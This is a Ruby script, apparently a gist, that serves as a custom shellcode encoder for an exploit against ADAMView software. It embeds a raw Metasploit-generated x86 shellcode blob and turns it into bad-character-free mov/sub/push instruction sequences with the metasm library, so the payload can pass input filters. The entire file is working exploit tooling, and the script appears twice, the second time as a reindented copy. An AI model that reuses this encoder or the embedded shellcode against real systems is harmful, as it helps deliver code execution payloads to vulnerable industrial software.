mfadzilr/encoder.rb

## encoder.rb
#!/usr/bin/env ruby
# Custom encoder for ADAMView Exploit
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 09/12/2014
# code is ugly

require 'metasm'

@shellcode = Array.new()

# copy paste your metasploit shellcode here
sc =
"\xda\xc3\xbd\x24\x3b\x5b\xa3\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x6a\x16\x03\x6a\x16\xe2\xd1\xc7" +
"\xb3\x2a\x19\x38\x44\x4d\x90\xdd\x75\x5f\xc6\x96\x24\x6f" +
"\x8d\xfb\xc4\x04\xc3\xef\x5f\x68\xcb\x00\xd7\xc7\x2d\x2e" +
"\xe8\xe9\xf1\xfc\x2a\x6b\x8d\xfe\x7e\x4b\xac\x30\x73\x8a" +
"\xe9\x2d\x7c\xde\xa2\x3a\x2f\xcf\xc7\x7f\xec\xee\x07\xf4" +
"\x4c\x89\x22\xcb\x39\x23\x2d\x1c\x91\x38\x65\x84\x99\x67" +
"\x55\xb5\x4e\x74\xa9\xfc\xfb\x4f\x5a\xff\x2d\x9e\xa3\x31" +
"\x12\x4d\x9a\xfd\x9f\x8f\xdb\x3a\x40\xfa\x17\x39\xfd\xfd" +
"\xec\x43\xd9\x88\xf0\xe4\xaa\x2b\xd0\x15\x7e\xad\x93\x1a" +
"\xcb\xb9\xfb\x3e\xca\x6e\x70\x3a\x47\x91\x56\xca\x13\xb6" +
"\x72\x96\xc0\xd7\x23\x72\xa6\xe8\x33\xda\x17\x4d\x38\xc9" +
"\x4c\xf7\x63\x84\x93\x75\x1e\xe1\x94\x85\x20\x42\xfd\xb4" +
"\xab\x0d\x7a\x49\x7e\x6a\x64\xab\xaa\x87\x0d\x72\x3f\x2a" +
"\x50\x85\xea\x69\x6d\x06\x1e\x12\x8a\x16\x6b\x17\xd6\x90" +
"\x80\x65\x47\x75\xa6\xda\x68\x5c\xcb\xaf\xe6\x3e\x7a\x3e" +
"\x73\xc1"

def locate_badchar(opchars)
  opchars.each_slice(1).map do |char|
    # static badchar.
    if (((char.join.hex.to_i > 0x60.to_i) && (char.join.hex.to_i < 0x7b.to_i)) || char.join.hex.to_i == 0x00.to_i || char.join.hex.to_i == 0xff.to_i)
       return false
    end
  end
  return true
end

def encode(sc_chars)
  offset = [0x1010101f,0x1111111f,0x1212121f,0x1313131f,0x1414141f,0x1515151f,0x1616161f,0x1717171f,0x1818181f,0x1919191f,0x1a1a1a1f,0x1b1b1b1f,0x1c1c1c1f,0x1d1d1d1f,0x1e1e1e1f,0x1f1f1f1f,0x2020202f,0x2121212f,0x2222222f,0x2323232f,0x2424242f,0x2525252f,0x2626262f,0x2727272f,0x2828282f,0x2929292f,0x2a2a2a2f,0x2b2b2b2f,0x2c2c2c2f,0x2d2d2d2f,0x2e2e2e2f,0x2f2f2f2f,0x3030303f,0x3131313f,0x3232323f,0x3333333f,0x3434343f,0x3535353f,0x3636363f,0x3737373f,0x3838383f,0x3939393f,0x3a3a3a3f,0x3b3b3b3f,0x3c3c3c3f,0x3d3d3d3f,0x3e3e3e3f,0x3f3f3f3f,0x4040404f,0x4141414f,0x4242424f,0x4343434f,0x4444444f,0x4545454f,0x4646464f,0x4747474f,0x4848484f,0x4949494f,0x4a4a4a4f,0x4b4b4b4f,0x4c4c4c4f,0x4d4d4d4f,0x4e4e4e4f,0x4f4f4f4f,0x5050505f,0x5151515f,0x5252525f,0x5353535f,0x5454545f,0x5555555f,0x5656565f,0x5757575f,0x5858585f,0x5959595f,0x5a5a5a5f,0x5b5b5b5f,0x5c5c5c5f,0x5d5d5d5f,0x5e5e5e5f,0x5f5f5f5f,0x8080808f,0x8181818f,0x8282828f,0x8383838f,0x8484848f,0x8585858f,0x8686868f,0x8787878f,0x8888888f,0x8989898f,0x8a8a8a8f,0x8b8b8b8f,0x8c8c8c8f,0x8d8d8d8f,0x8e8e8e8f,0x8f8f8f8f,0x9090909f,0x9191919f,0x9292929f,0x9393939f,0x9494949f,0x9595959f,0x9696969f,0x9797979f,0x9898989f,0x9999999f,0x9a9a9a9f,0x9b9b9b9f,0x9c9c9c9f,0x9d9d9d9f,0x9e9e9e9f,0x9f9f9f9f]

  # make sure shellcode 4 byte align
  case sc_chars.size
    when 1
      sc_chars << '909090'
    when 2
      sc_chars << '9090'
    when 3
      sc_chars << '90'
  end

  if locate_badchar(sc_chars)
    @opcode = %Q|
      mov eax,0x#{sc_chars.join.hex.to_s(16)}
      push eax
    |
  else
    offset.each do |base|
      add_sub = 0
      b = Array.new()
      if (sc_chars.join.hex + base).to_s(16).size > 8
        add_sub = 1
        (sc_chars.join.hex - base).to_s(16).split(//).each_slice(2) do |byte|
          b << byte.join
        end
      else
        (sc_chars.join.hex + base).to_s(16).split(//).each_slice(2) do |byte|
          b << byte.join
        end
      end

      # make sure all 4 bytes is good
      if locate_badchar(b)
        puts "Success"
        if add_sub == 0
          instruction = "sub eax,0x#{base.to_s(16)}"
        else
          instruction = "add eax,0x#{base.to_s(16)}"
        end
        @opcode = %Q|
          mov eax,0x#{b.join.hex.to_s(16)}
          #{instruction}
          push eax
        |

        break
      else
        puts "#{base.to_s(16)} : failed!"
        next
      end

    end
  end

  puts @opcode

  # encode opcode
  sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, @opcode).encode_string
  sc.each_byte do |x|
    @shellcode << "\\x" + ("%02x" % x)
  end

end

def load_sc(sc)
  data = Array.new()
  sc.each_byte.map do |x|
    data << "%02x" % x
  end
  reverse_sc(data)
end

def reverse_sc(data)
  data.reverse!
  count = 0
  data.each_slice(4) do |x|
    count += 1
    puts "[#{count}] #{x.join}"
    encode(x)
    puts "----------------------------"
  end
end

def format_output(data)
  lines = []
  data.each_slice(11) do |array|
      lines << array.join
    end

  out = []
  res = lines.map do |line|
    if line != lines.last
      out << "\"" + line + "\" +\n"
    else
      out << "\"" + line + "\"\n"
    end
  end

  return out
end

load_sc(sc)
puts "shellcode size: #{@shellcode.size}"
puts format_output(@shellcode)
	#!/usr/bin/env ruby
	# Custom encoder for ADAMView Exploit
	# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
	# Date : 09/12/2014
	# code is ugly

	require 'metasm'

	@shellcode = Array.new()

	# copy paste your metasploit shellcode here
	sc =
	"\xda\xc3\xbd\x24\x3b\x5b\xa3\xd9\x74\x24\xf4\x5a\x31\xc9" +
	"\xb1\x32\x83\xc2\x04\x31\x6a\x16\x03\x6a\x16\xe2\xd1\xc7" +
	"\xb3\x2a\x19\x38\x44\x4d\x90\xdd\x75\x5f\xc6\x96\x24\x6f" +
	"\x8d\xfb\xc4\x04\xc3\xef\x5f\x68\xcb\x00\xd7\xc7\x2d\x2e" +
	"\xe8\xe9\xf1\xfc\x2a\x6b\x8d\xfe\x7e\x4b\xac\x30\x73\x8a" +
	"\xe9\x2d\x7c\xde\xa2\x3a\x2f\xcf\xc7\x7f\xec\xee\x07\xf4" +
	"\x4c\x89\x22\xcb\x39\x23\x2d\x1c\x91\x38\x65\x84\x99\x67" +
	"\x55\xb5\x4e\x74\xa9\xfc\xfb\x4f\x5a\xff\x2d\x9e\xa3\x31" +
	"\x12\x4d\x9a\xfd\x9f\x8f\xdb\x3a\x40\xfa\x17\x39\xfd\xfd" +
	"\xec\x43\xd9\x88\xf0\xe4\xaa\x2b\xd0\x15\x7e\xad\x93\x1a" +
	"\xcb\xb9\xfb\x3e\xca\x6e\x70\x3a\x47\x91\x56\xca\x13\xb6" +
	"\x72\x96\xc0\xd7\x23\x72\xa6\xe8\x33\xda\x17\x4d\x38\xc9" +
	"\x4c\xf7\x63\x84\x93\x75\x1e\xe1\x94\x85\x20\x42\xfd\xb4" +
	"\xab\x0d\x7a\x49\x7e\x6a\x64\xab\xaa\x87\x0d\x72\x3f\x2a" +
	"\x50\x85\xea\x69\x6d\x06\x1e\x12\x8a\x16\x6b\x17\xd6\x90" +
	"\x80\x65\x47\x75\xa6\xda\x68\x5c\xcb\xaf\xe6\x3e\x7a\x3e" +
	"\x73\xc1"

	def locate_badchar(opchars)
	opchars.each_slice(1).map do \|char\|
	# static badchar.
	if (((char.join.hex.to_i > 0x60.to_i) && (char.join.hex.to_i < 0x7b.to_i)) \|\| char.join.hex.to_i == 0x00.to_i \|\| char.join.hex.to_i == 0xff.to_i)
	return false
	end
	end
	return true
	end

	def encode(sc_chars)
	offset = [0x1010101f,0x1111111f,0x1212121f,0x1313131f,0x1414141f,0x1515151f,0x1616161f,0x1717171f,0x1818181f,0x1919191f,0x1a1a1a1f,0x1b1b1b1f,0x1c1c1c1f,0x1d1d1d1f,0x1e1e1e1f,0x1f1f1f1f,0x2020202f,0x2121212f,0x2222222f,0x2323232f,0x2424242f,0x2525252f,0x2626262f,0x2727272f,0x2828282f,0x2929292f,0x2a2a2a2f,0x2b2b2b2f,0x2c2c2c2f,0x2d2d2d2f,0x2e2e2e2f,0x2f2f2f2f,0x3030303f,0x3131313f,0x3232323f,0x3333333f,0x3434343f,0x3535353f,0x3636363f,0x3737373f,0x3838383f,0x3939393f,0x3a3a3a3f,0x3b3b3b3f,0x3c3c3c3f,0x3d3d3d3f,0x3e3e3e3f,0x3f3f3f3f,0x4040404f,0x4141414f,0x4242424f,0x4343434f,0x4444444f,0x4545454f,0x4646464f,0x4747474f,0x4848484f,0x4949494f,0x4a4a4a4f,0x4b4b4b4f,0x4c4c4c4f,0x4d4d4d4f,0x4e4e4e4f,0x4f4f4f4f,0x5050505f,0x5151515f,0x5252525f,0x5353535f,0x5454545f,0x5555555f,0x5656565f,0x5757575f,0x5858585f,0x5959595f,0x5a5a5a5f,0x5b5b5b5f,0x5c5c5c5f,0x5d5d5d5f,0x5e5e5e5f,0x5f5f5f5f,0x8080808f,0x8181818f,0x8282828f,0x8383838f,0x8484848f,0x8585858f,0x8686868f,0x8787878f,0x8888888f,0x8989898f,0x8a8a8a8f,0x8b8b8b8f,0x8c8c8c8f,0x8d8d8d8f,0x8e8e8e8f,0x8f8f8f8f,0x9090909f,0x9191919f,0x9292929f,0x9393939f,0x9494949f,0x9595959f,0x9696969f,0x9797979f,0x9898989f,0x9999999f,0x9a9a9a9f,0x9b9b9b9f,0x9c9c9c9f,0x9d9d9d9f,0x9e9e9e9f,0x9f9f9f9f]

	# make sure shellcode 4 byte align
	case sc_chars.size
	when 1
	sc_chars << '909090'
	when 2
	sc_chars << '9090'
	when 3
	sc_chars << '90'
	end

	if locate_badchar(sc_chars)
	@opcode = %Q\|
	mov eax,0x#{sc_chars.join.hex.to_s(16)}
	push eax
	\|
	else
	offset.each do \|base\|
	add_sub = 0
	b = Array.new()
	if (sc_chars.join.hex + base).to_s(16).size > 8
	add_sub = 1
	(sc_chars.join.hex - base).to_s(16).split(//).each_slice(2) do \|byte\|
	b << byte.join
	end
	else
	(sc_chars.join.hex + base).to_s(16).split(//).each_slice(2) do \|byte\|
	b << byte.join
	end
	end

	# make sure all 4 bytes is good
	if locate_badchar(b)
	puts "Success"
	if add_sub == 0
	instruction = "sub eax,0x#{base.to_s(16)}"
	else
	instruction = "add eax,0x#{base.to_s(16)}"
	end
	@opcode = %Q\|
	mov eax,0x#{b.join.hex.to_s(16)}
	#{instruction}
	push eax
	\|

	break
	else
	puts "#{base.to_s(16)} : failed!"
	next
	end

	end
	end

	puts @opcode

	# encode opcode
	sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, @opcode).encode_string
	sc.each_byte do \|x\|
	@shellcode << "\\x" + ("%02x" % x)
	end

	end

	def load_sc(sc)
	data = Array.new()
	sc.each_byte.map do \|x\|
	data << "%02x" % x
	end
	reverse_sc(data)
	end

	def reverse_sc(data)
	data.reverse!
	count = 0
	data.each_slice(4) do \|x\|
	count += 1
	puts "[#{count}] #{x.join}"
	encode(x)
	puts "----------------------------"
	end
	end

	def format_output(data)
	lines = []
	data.each_slice(11) do \|array\|
	lines << array.join
	end

	out = []
	res = lines.map do \|line\|
	if line != lines.last
	out << "\"" + line + "\" +\n"
	else
	out << "\"" + line + "\"\n"
	end
	end

	return out
	end

	load_sc(sc)
	puts "shellcode size: #{@shellcode.size}"
	puts format_output(@shellcode)